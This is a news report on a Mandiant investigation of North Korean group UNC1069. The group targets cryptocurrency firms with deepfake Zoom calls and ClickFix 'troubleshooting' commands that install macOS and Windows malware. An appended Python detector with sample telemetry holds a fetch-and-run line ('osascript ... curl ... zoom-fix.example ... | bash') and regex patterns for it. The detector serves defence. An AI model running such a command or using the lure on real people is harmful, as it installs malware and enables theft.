North Korean hackers target crypto sector with new tools and ClickFix techniques 

North Korean hackers have orchestrated targeted campaigns against the cryptocurrency sector, using AI-generated deepfake video and the ClickFix social engineering technique to deliver malware to both macOS and Windows systems, according to new findings from Google’s Mandiant team.

The activity, which Mandiant attributes to the long-tracked threat group UNC1069, appears financially motivated and was uncovered during an investigation into an attack on a fintech company. Researchers say the operation began with a message sent over Telegram from a compromised account belonging to a cryptocurrency company executive.

After establishing trust, the attackers shared a Calendly link that led the victim to a spoofed Zoom meeting page hosted on attacker-controlled infrastructure. During the fake meeting, the victim was shown what appeared to be a deepfake video of a CEO from another cryptocurrency firm. The attackers then claimed there were audio issues and instructed the victim to run troubleshooting commands displayed on a webpage. The commands initiated the malware infection chain on both macOS and Windows.

At the start of the macOS compromise, the threat actor executed AppleScript and then deployed a malicious Mach-O binary. In total, the researchers observed seven distinct macOS malware families installed on the victim’s system: Waveshaper, Hypercall, Hidencall, Silencelift, Deepbreath, Sugarloader, and Chromepush. These include multiple backdoors, downloaders, and data-stealing tools designed to harvest credentials, browser data, and messaging app content, and even to bypass macOS privacy protections.

Mandiant says it is unusual to see so many malware tools deployed against a single target.

Some of the malware communicated with command-and-control (C&C) servers over HTTP, HTTPS, or WebSockets, while other tools established persistence through launch daemons or masqueraded as legitimate browser extensions. Mandiant noted that several of the tools, including Silencelift, Deepbreath, and Chromepush, had not previously been observed in the UNC1069 arsenal, and that most of the malware has little to no detection on public scanning platforms.
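As an added defender-side illustration, not code from the Mandiant report, the following Python correlates the three stages of the chain described above (AppleScript running a pasted "troubleshooting" command, a binary launched from a user-writable path, and launch daemon persistence) across process-execution events. The event format, file paths, domain, and all sample lines are constructed assumptions for this example.

```python
"""Detect a ClickFix-style macOS chain (AppleScript -> dropped Mach-O ->
launch daemon persistence) in process-execution events.
Event format and all samples are constructed: ts|parent|process|cmdline."""
from datetime import datetime, timedelta
import re

# Constructed sample telemetry; paths and domain are not real indicators.
SAMPLE_EVENTS = """\
2025-01-10T09:00:01Z|Terminal|osascript|osascript -e 'do shell script "curl -fsSL https://zoom-fix.example/audio | bash"'
2025-01-10T09:00:04Z|bash|.zoomfix|/Users/dev/Library/Caches/.zoomfix
2025-01-10T09:00:09Z|.zoomfix|launchctl|launchctl load /Library/LaunchDaemons/com.zoom.audiofix.plist
2025-01-10T11:30:00Z|Terminal|osascript|osascript -e 'tell application "Finder" to activate'
"""

# Stages are matched strictly in this order within the correlation window.
STAGE_ORDER = ["applescript_fetch", "payload_exec", "launchd_persist"]
STAGE_PATTERNS = {
    # Stage 1: AppleScript wrapping a remote fetch piped into a shell, the
    # shape of the "fix your audio" command a ClickFix page asks victims to run.
    "applescript_fetch": re.compile(r"^osascript\b.*\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    # Stage 2: a binary executed from a user-writable, normally code-free path.
    "payload_exec": re.compile(r"^(/Users/[^/]+/Library|/tmp|/private/tmp|/var/folders)/\S+$"),
    # Stage 3: launchctl loading a LaunchDaemon/LaunchAgent for persistence.
    "launchd_persist": re.compile(r"^launchctl\s+(load|bootstrap)\b.*Launch(Daemons|Agents)/"),
}

def parse_events(text):
    """Parse pipe-delimited lines into (time, parent, process, cmdline)."""
    events = []
    for line in text.strip().splitlines():
        ts, parent, proc, cmd = line.split("|", 3)  # cmdline may contain '|'
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), parent, proc, cmd))
    return events

def detect_clickfix_chain(events, window=timedelta(minutes=10)):
    """Return the stage names matched in order within `window` of the first
    hit; all three stages together is a high-confidence alert."""
    matched, start = [], None
    for ts, _parent, _proc, cmd in events:
        if len(matched) == len(STAGE_ORDER):
            break
        nxt = STAGE_ORDER[len(matched)]
        if STAGE_PATTERNS[nxt].search(cmd):
            start = start or ts
            if ts - start <= window:
                matched.append(nxt)
    return matched

if __name__ == "__main__":
    print(detect_clickfix_chain(parse_events(SAMPLE_EVENTS)))
```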
